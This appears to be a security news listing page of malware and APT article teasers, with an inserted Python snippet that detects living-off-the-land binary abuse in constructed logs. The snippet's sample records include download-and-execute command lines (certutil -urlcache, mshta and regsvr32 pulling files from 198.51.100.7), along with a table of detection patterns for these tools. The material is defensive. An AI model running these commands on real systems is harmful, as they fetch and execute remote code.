APT36 Using Customized Malware to Attack Indian Government Linux and Windows Servers
APT36 is a sophisticated APT (Advanced Persistent Threat) group known for conducting targeted espionage in South Asia and strongly linked to Pakistan.
While this APT group is known for targeting the...
OriginBotnet Attacks Windows Machines Using Weaponized Word Document
A recently discovered campaign used a malicious Word document, delivered via phishing emails, to make victims download a loader that then launched a succession of malware payloads.
OriginBotnet, RedLine Clipper, and Agent Tesla...
Loda Malware Attacks Windows to Control RDP, Spread Malware, and Log User Inputs
Threat actors have been actively employing Loda, a remote access trojan (RAT) written in AutoIt, an accessible scripting language for automating tasks on Windows computers.
The malware may deliver various harmful payloads in addition to keylogging, taking...
Hackers Abuse Windows Container Isolation Framework to Bypass Security Defences
Cybersecurity researchers at Deep Instinct recently reported that attackers can abuse the Windows container isolation framework to bypass organizations' security defenses and detection mechanisms.
Containers revolutionize the way applications are packaged and isolated,...
Researchers Discover 12 New LOLBAS Binaries that are Used by Attackers
Hackers actively leverage LOLBAS (Living-Off-the-Land Binaries And Scripts), a popular methodology in which threat actors abuse legitimate tools already present on the system to hide the illicit actions they perform.
Since LOLBAS is gaining traction at a rapid...
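As an added illustration of the LOLBAS methodology described above, the following Python snippet runs simple detection logic over a few constructed process-creation records. It is example code written for this page, not code from the article or from the research it covers; the binaries and argument patterns it checks are well-known abuse shapes chosen here as assumptions, not the 12 new binaries the article reports, and the log lines are constructed, not real telemetry.

```python
import re
from dataclasses import dataclass

# Hypothetical, Sysmon-style process-creation records (constructed for this example).
# A real pipeline would consume structured EVTX/JSON fields instead of " | "-separated text.
SAMPLE_LOG = [
    r"Image=C:\Windows\System32\certutil.exe | CommandLine=certutil -urlcache -split -f http://198.51.100.7/p.txt C:\Users\Public\p.txt | ParentImage=C:\Windows\System32\cmd.exe",
    r"Image=C:\Windows\System32\certutil.exe | CommandLine=certutil -hashfile C:\Windows\notepad.exe SHA256 | ParentImage=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    r"Image=C:\Windows\System32\mshta.exe | CommandLine=mshta.exe http://198.51.100.7/a.hta | ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    r"Image=C:\Windows\System32\regsvr32.exe | CommandLine=regsvr32 /s /n /u /i:http://198.51.100.7/f.sct scrobj.dll | ParentImage=C:\Windows\explorer.exe",
    r"Image=C:\Windows\System32\rundll32.exe | CommandLine=rundll32.exe shell32.dll,Control_RunDLL | ParentImage=C:\Windows\explorer.exe",
    r"Image=C:\Windows\System32\notepad.exe | CommandLine=notepad.exe C:\Users\alice\notes.txt | ParentImage=C:\Windows\explorer.exe",
]

# Assumed abuse patterns per living-off-the-land binary: the binary itself is legitimate,
# so the signal has to come from the arguments, not from the image name alone.
LOLBAS_RULES = {
    "certutil.exe": [r"-urlcache", r"-decode", r"-encode"],
    "mshta.exe": [r"https?://", r"(?:java|vb)script:"],
    "regsvr32.exe": [r"/i:https?://", r"scrobj\.dll"],
    "rundll32.exe": [r"javascript:", r"https?://"],
    "bitsadmin.exe": [r"/transfer", r"/addfile"],
    "msiexec.exe": [r"https?://"],
    "wmic.exe": [r"process\s+call\s+create", r"/format:"],
}

# Office applications spawning any LOLBin is suspicious regardless of arguments.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the created process
    command_line: str   # its command line
    parent_image: str   # full path of the parent process


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_line(line: str) -> ProcEvent:
    """Parse one ' | '-separated key=value record into a ProcEvent."""
    fields = dict(kv.split("=", 1) for kv in line.split(" | "))
    return ProcEvent(fields["Image"], fields["CommandLine"], fields["ParentImage"])


def classify(ev: ProcEvent) -> list:
    """Return (kind, binary, detail) findings for one event; empty list if benign."""
    findings = []
    img = basename(ev.image)
    for pattern in LOLBAS_RULES.get(img, []):
        if re.search(pattern, ev.command_line, re.IGNORECASE):
            findings.append(("suspicious-args", img, pattern))
            break  # one argument hit per event is enough to alert
    parent = basename(ev.parent_image)
    if img in LOLBAS_RULES and parent in OFFICE_PARENTS:
        findings.append(("office-child", img, parent))
    return findings


def scan(lines) -> list:
    """Run classify() over raw log lines; returns [(line_index, finding), ...]."""
    results = []
    for idx, line in enumerate(lines):
        for finding in classify(parse_line(line)):
            results.append((idx, finding))
    return results


if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_LOG):
        print(f"line {idx}: {finding}")
```

Note that the second certutil record (a plain hash computation) and the rundll32 control-panel launch produce no findings: the point of a LOLBAS rule is to key on the abused arguments and the spawning context, because blocking or alerting on the binary name alone would flood analysts with legitimate activity.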
Beware! DarkWatchMan RAT Hides in Windows Registry
Cyble Research and Intelligence Labs (CRIL) recently detected a phishing website impersonating the popular Russian site CryptoPro CSP.
The distribution of DarkWatchman malware was being carried out by...
Hackers Using Microsoft-signed Malicious Windows Drivers in Ransomware Attacks
Following a series of cyberattacks, including ransomware attacks, Microsoft recently revoked several Microsoft hardware developer accounts.
In a coordinated disclosure, the news came from the following entities:
Microsoft
Mandiant
Sophos
SentinelOne
Authenticode signatures from Microsoft's Windows Hardware Developer Program have...
Easy Way to Fix Windows Security Not Opening in Windows
Windows Security Center is one of Microsoft's most popular and trusted products; it protects your PC from malware and other threats. However, some users may experience some performance...
Windows Event Log Bugs Let Hackers Perform DoS & Remotely Crash Event Log Apps
Security researchers at Varonis Threat Labs recently revealed that Microsoft Windows contains two vulnerabilities in the Event Log, one of which can be exploited to cause a Denial of Service...
Cheerscrypt Linux-based Ransomware Encrypts Both Linux & Windows Systems
In a recent investigation, the security firm Sygnia found a Linux-based ransomware, Cheerscrypt, that uses the TTPs of Night Sky ransomware.
There is a common threat group called Emperor Dragonfly (A.K.A. DEV-0401/BRONZE STARLIGHT)...